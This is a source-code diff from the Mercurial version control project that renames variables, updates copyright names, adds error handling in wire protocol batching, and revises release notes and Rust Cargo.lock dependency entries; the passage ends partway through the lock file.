+++ b/mercurial/wireprotoserver.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
--- a/mercurial/wireprotov1peer.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov1peer.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# wireprotov1peer.py - Client-side functionality for wire protocol version 1.
#
-# Copyright 2005-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -43,14 +43,14 @@
@batchable
def sample(self, one, two=None):
# Build list of encoded arguments suitable for your wire protocol:
- encargs = [('one', encode(one),), ('two', encode(two),)]
+ encoded_args = [('one', encode(one),), ('two', encode(two),)]
# Create future for injection of encoded result:
- encresref = future()
+ encoded_res_future = future()
# Return encoded arguments and future:
- yield encargs, encresref
+ yield encoded_args, encoded_res_future
# Assuming the future to be filled with the result from the batched
# request now. Decode it:
- yield decode(encresref.value)
+ yield decode(encoded_res_future.value)
The decorator returns a function which wraps this coroutine as a plain
method, but adds the original method as an attribute called "batchable",
@@ -60,12 +60,12 @@
def plain(*args, **opts):
batchable = f(*args, **opts)
- encargsorres, encresref = next(batchable)
- if not encresref:
- return encargsorres # a local result in this case
+ encoded_args_or_res, encoded_res_future = next(batchable)
+ if not encoded_res_future:
+ return encoded_args_or_res # a local result in this case
self = args[0]
cmd = pycompat.bytesurl(f.__name__) # ensure cmd is ascii bytestr
- encresref.set(self._submitone(cmd, encargsorres))
+ encoded_res_future.set(self._submitone(cmd, encoded_args_or_res))
return next(batchable)
setattr(plain, 'batchable', f)
@@ -257,15 +257,15 @@
# Encoded arguments and future holding remote result.
try:
- encargsorres, fremote = next(batchable)
+ encoded_args_or_res, fremote = next(batchable)
except Exception:
pycompat.future_set_exception_info(f, sys.exc_info()[1:])
return
if not fremote:
- f.set_result(encargsorres)
+ f.set_result(encoded_args_or_res)
else:
- requests.append((command, encargsorres))
+ requests.append((command, encoded_args_or_res))
states.append((command, f, batchable, fremote))
if not requests:
@@ -310,7 +310,7 @@
if not f.done():
f.set_exception(
error.ResponseError(
- _(b'unfulfilled batch command response')
+ _(b'unfulfilled batch command response'), None
)
)
@@ -322,16 +322,27 @@
for command, f, batchable, fremote in states:
# Grab raw result off the wire and teach the internal future
# about it.
- remoteresult = next(wireresults)
- fremote.set(remoteresult)
+ try:
+ remoteresult = next(wireresults)
+ except StopIteration:
+ # This can happen in particular because next(batchable)
+ # in the previous iteration can call peer._abort, which
+ # may close the peer.
+ f.set_exception(
+ error.ResponseError(
+ _(b'unfulfilled batch command response'), None
+ )
+ )
+ else:
+ fremote.set(remoteresult)
- # And ask the coroutine to decode that value.
- try:
- result = next(batchable)
- except Exception:
- pycompat.future_set_exception_info(f, sys.exc_info()[1:])
- else:
- f.set_result(result)
+ # And ask the coroutine to decode that value.
+ try:
+ result = next(batchable)
+ except Exception:
+ pycompat.future_set_exception_info(f, sys.exc_info()[1:])
+ else:
+ f.set_result(result)
@interfaceutil.implementer(
--- a/mercurial/wireprotov1server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov1server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,6 +1,6 @@
# wireprotov1server.py - Wire protocol version 1 server functionality
#
-# Copyright 2005-2010 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2010 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -27,6 +27,7 @@
exchange,
pushkey as pushkeymod,
pycompat,
+ requirements as requirementsmod,
streamclone,
util,
wireprototypes,
@@ -108,7 +109,7 @@
4. server.bundle1
"""
ui = repo.ui
- gd = b'generaldelta' in repo.requirements
+ gd = requirementsmod.GENERALDELTA_REQUIREMENT in repo.requirements
if gd:
v = ui.configbool(b'server', b'bundle1gd.%s' % action)
@@ -310,7 +311,7 @@
caps.append(b'stream-preferred')
requiredformats = repo.requirements & repo.supportedformats
# if our local revlogs are just revlogv1, add 'stream' cap
- if not requiredformats - {b'revlogv1'}:
+ if not requiredformats - {requirementsmod.REVLOGV1_REQUIREMENT}:
caps.append(b'stream')
# otherwise, add 'streamreqs' detailing our local revlog format
else:
--- a/mercurial/wireprotov2server.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/wireprotov2server.py Tue Apr 20 11:01:06 2021 -0400
@@ -1,5 +1,5 @@
# Copyright 21 May 2005 - (c) 2005 Jake Edge <jake@edge2.net>
-# Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
+# Copyright 2005-2007 Olivia Mackall <olivia@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
@@ -1582,7 +1582,8 @@
# TODO this is a bunch of storage layer interface abstractions because
# it assumes revlogs.
- for name, encodedname, size in topfiles:
+ for rl_type, name, encodedname, size in topfiles:
+ # XXX use the `rl_type` for that
if b'changelog' in files and name.startswith(b'00changelog'):
pass
elif b'manifestlog' in files and name.startswith(b'00manifest'):
--- a/mercurial/worker.py Thu Mar 25 19:06:28 2021 -0400
+++ b/mercurial/worker.py Tue Apr 20 11:01:06 2021 -0400
@@ -442,7 +442,7 @@
we ever write workers that need to preserve grouping in input
we should consider allowing callers to specify a partition strategy.
- mpm is not a fan of this partitioning strategy when files are involved.
+ olivia is not a fan of this partitioning strategy when files are involved.
In his words:
Single-threaded Mercurial makes a point of creating and visiting
--- /dev/null Thu Jan 01 00:00:00 1970 +0000
+++ b/pyproject.toml Tue Apr 20 11:01:06 2021 -0400
@@ -0,0 +1,18 @@
+[build-system]
+requires = ["setuptools", "wheel"]
+build-backend = "setuptools.build_meta"
+
+[tool.black]
+line-length = 80
+exclude = '''
+build/
+| wheelhouse/
+| dist/
+| packages/
+| \.hg/
+| \.mypy_cache/
+| \.venv/
+| mercurial/thirdparty/
+'''
+skip-string-normalization = true
+quiet = true
--- a/relnotes/5.7 Thu Mar 25 19:06:28 2021 -0400
+++ b/relnotes/5.7 Tue Apr 20 11:01:06 2021 -0400
@@ -17,6 +17,8 @@
can be e.g. `rebase`. As part of this effort, the default format
from `hg rebase` was reorganized a bit.
+ * `hg purge` is now a core command using `--confirm` by default.
+
* `hg diff` and `hg extdiff` now support `--from <rev>` and `--to <rev>`
arguments as clearer alternatives to `-r <revs>`. `-r <revs>` has been
deprecated.
@@ -43,6 +45,9 @@
* The `branchmap` cache is updated more intelligently and can be
significantly faster for repositories with many branches and changesets.
+ * The `rev-branch-cache` is now updated incrementally whenever changesets
+ are added.
+
== New Experimental Features ==
@@ -64,4 +69,5 @@
== Internal API Changes ==
-
+ * `changelog.branchinfo` is deprecated and will be removed after 5.8.
+ It is superseded by `changelogrevision.branchinfo`.
--- a/relnotes/next Thu Mar 25 19:06:28 2021 -0400
+++ b/relnotes/next Tue Apr 20 11:01:06 2021 -0400
@@ -1,8 +1,24 @@
== New Features ==
+
+ * `hg purge` is now a core command using `--confirm` by default.
+
+ * The `rev-branch-cache` is now updated incrementally whenever changesets
+ are added.
+ * The new options `experimental.bundlecompthreads` and
+ `experimental.bundlecompthreads.<engine>` can be used to instruct
+ the compression engines for bundle operations to use multiple threads
+ for compression. The default is single threaded operation. Currently
+ only supported for zstd.
== New Experimental Features ==
+ * There's a new `diff.merge` config option to show the changes
+ relative to an automerge for merge changesets. This makes it
+ easier to detect and review manual changes performed in merge
+ changesets. It is supported by `hg diff --change`, `hg log -p`
+ `hg incoming -p`, and `hg outgoing -p` so far.
+
== Bug Fixes ==
@@ -10,7 +26,24 @@
== Backwards Compatibility Changes ==
+ * In normal repositories, the first parent of a changeset is not null,
+ unless both parents are null (like the first changeset). Some legacy
+ repositories violate this condition. The revlog code will now
+ silentely swap the parents if this condition is tested. This can
+ change the output of `hg log` when explicitly asking for first or
+ second parent.
+
== Internal API Changes ==
+ * `changelog.branchinfo` is deprecated and will be removed after 5.8.
+ It is superseded by `changelogrevision.branchinfo`.
+ * Callbacks for revlog.addgroup and the changelog._nodeduplicatecallback hook
+ now get a revision number as argument instead of a node.
+
+ * revlog.addrevision returns the revision number instead of the node.
+
+ * `nodes.nullid` and related constants are being phased out as part of
+ the deprecation of SHA1. Repository instances and related classes
+ provide access via `nodeconstants` and in some cases `nullid` attributes.
--- a/rust/Cargo.lock Thu Mar 25 19:06:28 2021 -0400
+++ b/rust/Cargo.lock Tue Apr 20 11:01:06 2021 -0400
@@ -4,1009 +4,1101 @@
name = "adler"
version = "0.2.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee2a4ec343196209d6594e19543ae87a39f96d5534d7174822a3ad825dd6ed7e"
[[package]]
name = "aho-corasick"
version = "0.7.15"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7404febffaa47dac81aa44dba71523c9d069b1bdc50a77db41195149e17f68e5"
dependencies = [
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
+ "memchr",
]
[[package]]
name = "ansi_term"
version = "0.11.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ee49baf6cb617b853aa8d93bf420db2383fab46d314482ca2803b40d5fde979b"
dependencies = [
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "winapi",
]
[[package]]
name = "atty"
version = "0.2.14"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d9b39be18770d11421cdb1b9947a45dd3f37e93092cbf377614828a319d5fee8"
dependencies = [
- "hermit-abi 0.1.17 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "winapi 0.3.9 (registry+https://github.com/rust-lang/crates.io-index)",
+ "hermit-abi",
+ "libc",
+ "winapi",
]
[[package]]
name = "autocfg"
version = "1.0.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cdb031dd78e28731d87d56cc8ffef4a8f36ca26c38fe2de700543e627f8a464a"
[[package]]
name = "bitflags"
version = "1.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cf1de2fe8c75bc145a2f577add951f8134889b4795d47466a54a5c846d691693"
[[package]]
name = "bitmaps"
version = "2.1.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "031043d04099746d8db04daf1fa424b2bc8bd69d92b25962dcde24da39ab64a2"
dependencies = [
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "typenum",
]
[[package]]
name = "byteorder"
version = "1.3.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "08c48aae112d48ed9f069b33538ea9e3e90aa263cfa3d1c24309612b1f7472de"
+
+[[package]]
+name = "bytes-cast"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3196ba300c7bc9282a4331e878496cb3e9603a898a8f1446601317163e16ca52"
+dependencies = [
+ "bytes-cast-derive",
+]
+
+[[package]]
+name = "bytes-cast-derive"
+version = "0.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cb936af9de38476664d6b58e529aff30d482e4ce1c5e150293d00730b0d81fdb"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
+]
[[package]]
name = "cc"
version = "1.0.66"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4c0496836a84f8d0495758516b8621a622beb77c0fed418570e50764093ced48"
dependencies = [
- "jobserver 0.1.21 (registry+https://github.com/rust-lang/crates.io-index)",
+ "jobserver",
]
[[package]]
name = "cfg-if"
version = "0.1.10"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4785bdd1c96b2a846b2bd7cc02e86b6b3dbf14e7e53446c4f54c92a361040822"
[[package]]
name = "cfg-if"
version = "1.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "baf1de4339761588bc0619e3cbc0120ee582ebb74b53b4efbf79117bd2da40fd"
+
+[[package]]
+name = "chrono"
+version = "0.4.19"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "670ad68c9088c2a963aaa298cb369688cf3f9465ce5e2d4ca10e6e0098a1ce73"
+dependencies = [
+ "libc",
+ "num-integer",
+ "num-traits",
+ "time",
+ "winapi",
+]
[[package]]
name = "clap"
version = "2.33.3"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "37e58ac78573c40708d45522f0d80fa2f01cc4f9b4e2bf749807255454312002"
dependencies = [
- "ansi_term 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "bitflags 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "strsim 0.8.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "textwrap 0.11.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "unicode-width 0.1.8 (registry+https://github.com/rust-lang/crates.io-index)",
- "vec_map 0.8.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "ansi_term",
+ "atty",
+ "bitflags",
+ "strsim",
+ "textwrap",
+ "unicode-width",
+ "vec_map",
]
[[package]]
name = "const_fn"
version = "0.4.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cd51eab21ab4fd6a3bf889e2d0958c0a6e3a61ad04260325e919e652a2a62826"
[[package]]
name = "cpython"
-version = "0.4.1"
+version = "0.5.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0f11357af68648b6a227e7e2384d439cec8595de65970f45e3f7f4b2600be472"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "num-traits 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "python27-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "python3-sys 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
+ "num-traits",
+ "paste",
+ "python27-sys",
+ "python3-sys",
]
[[package]]
name = "crc32fast"
version = "1.2.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "81156fece84ab6a9f2afdb109ce3ae577e42b1228441eded99bd77f627953b1a"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
]
[[package]]
name = "crossbeam-channel"
version = "0.4.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b153fe7cbef478c567df0f972e02e6d736db11affe43dfc9c56a9374d1adfb87"
dependencies = [
- "crossbeam-utils 0.7.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "maybe-uninit 2.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "crossbeam-utils 0.7.2",
+ "maybe-uninit",
]
[[package]]
name = "crossbeam-channel"
version = "0.5.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "dca26ee1f8d361640700bde38b2c37d8c22b3ce2d360e1fc1c74ea4b0aa7d775"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crossbeam-utils 0.8.1",
]
[[package]]
name = "crossbeam-deque"
version = "0.8.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94af6efb46fef72616855b036a624cf27ba656ffc9be1b9a3c931cfc7749a9a9"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-epoch 0.9.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crossbeam-epoch",
+ "crossbeam-utils 0.8.1",
]
[[package]]
name = "crossbeam-epoch"
version = "0.9.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a1aaa739f95311c2c7887a76863f500026092fb1dce0161dab577e559ef3569d"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "const_fn 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-utils 0.8.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "memoffset 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "scopeguard 1.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "const_fn",
+ "crossbeam-utils 0.8.1",
+ "lazy_static",
+ "memoffset",
+ "scopeguard",
]
[[package]]
name = "crossbeam-utils"
version = "0.7.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "c3c7c73a2d1e9fc0886a08b93e98eb643461230d5f1925e4036204d5f2e261a8"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "cfg-if 0.1.10",
+ "lazy_static",
]
[[package]]
name = "crossbeam-utils"
version = "0.8.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "02d96d1e189ef58269ebe5b97953da3274d83a93af647c2ddd6f9dab28cedb8d"
dependencies = [
- "autocfg 1.0.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
+ "autocfg",
+ "cfg-if 1.0.0",
+ "lazy_static",
]
[[package]]
name = "ctor"
version = "0.1.16"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7fbaabec2c953050352311293be5c6aba8e141ba19d6811862b232d6fd020484"
dependencies = [
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "quote",
+ "syn",
+]
+
+[[package]]
+name = "derive_more"
+version = "0.99.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "41cb0e6161ad61ed084a36ba71fbba9e3ac5aee3606fb607fe08da6acbcf3d8c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn",
]
[[package]]
name = "difference"
version = "2.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "524cbf6897b527295dff137cec09ecf3a05f4fddffd7dfcd1585403449e74198"
[[package]]
name = "either"
version = "1.6.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e78d4f1cc4ae33bbfc157ed5d5a5ef3bc29227303d595861deb238fcec4e9457"
[[package]]
name = "env_logger"
version = "0.7.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "44533bbbb3bb3c1fa17d9f2e4e38bbbaf8396ba82193c4cb1b6445d711445d36"
dependencies = [
- "atty 0.2.14 (registry+https://github.com/rust-lang/crates.io-index)",
- "humantime 1.3.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "termcolor 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "atty",
+ "humantime",
+ "log",
+ "regex",
+ "termcolor",
]
[[package]]
name = "flate2"
version = "1.0.19"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7411863d55df97a419aa64cb4d2f167103ea9d767e2c54a1868b7ac3f6b47129"
dependencies = [
- "cfg-if 1.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "crc32fast 1.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "libz-sys 1.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "miniz_oxide 0.4.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 1.0.0",
+ "crc32fast",
+ "libc",
+ "libz-sys",
+ "miniz_oxide",
]
[[package]]
name = "format-bytes"
-version = "0.1.3"
+version = "0.2.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1c4e89040c7fd7b4e6ba2820ac705a45def8a0c098ec78d170ae88f1ef1d5762"
dependencies = [
- "format-bytes-macros 0.1.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)",
+ "format-bytes-macros",
+ "proc-macro-hack",
]
[[package]]
name = "format-bytes-macros"
-version = "0.1.2"
+version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "b05089e341a0460449e2210c3bf7b61597860b07f0deae58da38dbed0a4c6b6d"
dependencies = [
- "proc-macro-hack 0.5.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "proc-macro2 1.0.24 (registry+https://github.com/rust-lang/crates.io-index)",
- "quote 1.0.7 (registry+https://github.com/rust-lang/crates.io-index)",
- "syn 1.0.54 (registry+https://github.com/rust-lang/crates.io-index)",
+ "proc-macro-hack",
+ "proc-macro2",
+ "quote",
+ "syn",
]
[[package]]
name = "fuchsia-cprng"
version = "0.1.1"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a06f77d526c1a601b7c4cdd98f54b5eaabffc14d5f2f0296febdc7f357c6d3ba"
[[package]]
name = "gcc"
version = "0.3.55"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f5f3913fa0bfe7ee1fd8248b6b9f42a5af4b9d65ec2dd2c3c26132b950ecfc2"
[[package]]
name = "getrandom"
version = "0.1.15"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fc587bc0ec293155d5bfa6b9891ec18a1e330c234f896ea47fbada4cadbe47e6"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "wasi 0.9.0+wasi-snapshot-preview1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
+ "libc",
+ "wasi 0.9.0+wasi-snapshot-preview1",
]
[[package]]
name = "glob"
version = "0.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b919933a397b79c37e33b77bb2aa3dc8eb6e165ad809e58ff75bc7db2e34574"
[[package]]
name = "hermit-abi"
version = "0.1.17"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5aca5565f760fb5b220e499d72710ed156fdb74e631659e99377d9ebfbd13ae8"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
]
[[package]]
-name = "hex"
-version = "0.4.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-
-[[package]]
name = "hg-core"
version = "0.1.0"
dependencies = [
- "byteorder 1.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "clap 2.33.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "crossbeam-channel 0.4.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "flate2 1.0.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "format-bytes 0.1.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "hex 0.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "im-rc 15.0.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "lazy_static 1.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
- "memchr 2.3.4 (registry+https://github.com/rust-lang/crates.io-index)",
- "memmap 0.7.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "micro-timer 0.3.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "pretty_assertions 0.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand 0.7.3 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_distr 0.2.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_pcg 0.2.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rayon 1.5.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "regex 1.4.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "rust-crypto 0.2.36 (registry+https://github.com/rust-lang/crates.io-index)",
- "same-file 1.0.6 (registry+https://github.com/rust-lang/crates.io-index)",
- "tempfile 3.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "twox-hash 1.6.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "zstd 0.5.3+zstd.1.4.5 (registry+https://github.com/rust-lang/crates.io-index)",
+ "byteorder",
+ "bytes-cast",
+ "clap",
+ "crossbeam-channel 0.4.4",
+ "derive_more",
+ "flate2",
+ "format-bytes",
+ "home",
+ "im-rc",
+ "lazy_static",
+ "log",
+ "memmap",
+ "micro-timer",
+ "pretty_assertions",
+ "rand 0.7.3",
+ "rand_distr",
+ "rand_pcg",
+ "rayon",
+ "regex",
+ "rust-crypto",
+ "same-file",
+ "tempfile",
+ "twox-hash",
+ "zstd",
]
[[package]]
name = "hg-cpython"
version = "0.1.0"
dependencies = [
- "cpython 0.4.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "env_logger 0.7.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "hg-core 0.1.0",
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
- "log 0.4.11 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cpython",
+ "crossbeam-channel 0.4.4",
+ "env_logger",
+ "hg-core",
+ "libc",
+ "log",
+]
+
+[[package]]
+name = "home"
+version = "0.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2456aef2e6b6a9784192ae780c0f15bc57df0e918585282325e8c8ac27737654"
+dependencies = [
+ "winapi",
]
[[package]]
name = "humantime"
version = "1.3.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "df004cfca50ef23c36850aaaa59ad52cc70d0e90243c3c7737a4dd32dc7a3c4f"
dependencies = [
- "quick-error 1.2.3 (registry+https://github.com/rust-lang/crates.io-index)",
+ "quick-error",
]
[[package]]
name = "im-rc"
version = "15.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3ca8957e71f04a205cb162508f9326aea04676c8dfd0711220190d6b83664f3f"
dependencies = [
- "bitmaps 2.1.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_core 0.5.1 (registry+https://github.com/rust-lang/crates.io-index)",
- "rand_xoshiro 0.4.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "sized-chunks 0.6.2 (registry+https://github.com/rust-lang/crates.io-index)",
- "typenum 1.12.0 (registry+https://github.com/rust-lang/crates.io-index)",
- "version_check 0.9.2 (registry+https://github.com/rust-lang/crates.io-index)",
+ "bitmaps",
+ "rand_core 0.5.1",
+ "rand_xoshiro",
+ "sized-chunks",
+ "typenum",
+ "version_check",
]
[[package]]
name = "itertools"
version = "0.9.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "284f18f85651fe11e8a991b2adb42cb078325c996ed026d994719efcfca1d54b"
dependencies = [
- "either 1.6.1 (registry+https://github.com/rust-lang/crates.io-index)",
+ "either",
]
[[package]]
name = "jobserver"
version = "0.1.21"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5c71313ebb9439f74b00d9d2dcec36440beaf57a6aa0623068441dd7cd81a7f2"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
+ "libc",
]
[[package]]
name = "lazy_static"
version = "1.4.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e2abad23fbc42b3700f2f279844dc832adb2b2eb069b2df918f455c4e18cc646"
[[package]]
name = "libc"
version = "0.2.81"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1482821306169ec4d07f6aca392a4681f66c75c9918aa49641a2595db64053cb"
[[package]]
name = "libz-sys"
version = "1.1.2"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "602113192b08db8f38796c4e85c39e960c145965140e918018bcde1952429655"
dependencies = [
- "cc 1.0.66 (registry+https://github.com/rust-lang/crates.io-index)",
- "pkg-config 0.3.19 (registry+https://github.com/rust-lang/crates.io-index)",
- "vcpkg 0.2.11 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cc",
+ "pkg-config",
+ "vcpkg",
]
[[package]]
name = "log"
version = "0.4.11"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4fabed175da42fed1fa0746b0ea71f412aa9d35e76e95e59b192c64b9dc2bf8b"
dependencies = [
- "cfg-if 0.1.10 (registry+https://github.com/rust-lang/crates.io-index)",
+ "cfg-if 0.1.10",
]
[[package]]
name = "maybe-uninit"
version = "2.0.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "60302e4db3a61da70c0cb7991976248362f30319e88850c487b9b95bbf059e00"
[[package]]
name = "memchr"
version = "2.3.4"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0ee1c47aaa256ecabcaea351eae4a9b01ef39ed810004e298d2511ed284b1525"
[[package]]
name = "memmap"
version = "0.7.0"
source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6585fd95e7bb50d6cc31e20d4cf9afb4e2ba16c5846fc76793f11218da9c475b"
dependencies = [
- "libc 0.2.81 (registry+https://github.com/rust-lang/crates.io-index)",
